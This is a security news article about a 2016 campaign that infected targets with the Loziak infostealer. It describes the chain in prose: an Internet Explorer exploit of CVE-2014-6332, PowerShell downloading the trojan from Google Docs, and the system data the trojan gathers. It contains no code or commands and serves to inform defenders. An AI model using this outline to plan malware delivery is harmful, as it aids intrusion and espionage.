During the month of March 2016, a threat group has used a combination of exploits in Internet Explorer, the no-limits scripting of Windows PowerShell, and malware stored on Google Docs to infect targets with the Loziak trojan.
The Loziak trojan surfaced on the malware scene in March 2015, when Symantec observed cyber-espionage groups using it to spy on companies from the energy sector in countries from the Middle East.
Loziak is a simple infostealer, regularly used in reconnaissance campaigns when threat groups are gathering information on their target to use in attacks at a later stage.
Attack starts with malicious JavaScript code hosted on a Polish server:
In this particular distribution campaign, crooks were using malicious JavaScript hosted on a Polish server.
When a victim using the Internet Explorer browser would get tricked into accessing a page hosting the malicious code, an exploit would execute, leverage the CVE-2014-6332 vulnerability and execute VBScript via Internet Explorer.
All IE versions from 3 to 11 are vulnerable, and the crooks would enter a so-called GodMode on the user’s machine. From here, the crooks would use Windows PowerShell scripts to download the Loziak executable from a Google Docs URL.
Loziak is a perfect reconnaissance tool:
Loziak is installed, and the trojan immediately starts collecting information on its targets. The infostealer would collect information on the computer’s name, CPU details, RAM size, location (country), and if the user had any antivirus software installed.
The data would then be sent to the crooks’ servers, where it will probably be used in other attacks if they didn’t happen yet.
Security researchers found it extremely curious that crooks managed to host Loziak on Google’s servers. Google is known to run automated virus scans on all the files hosted on its servers.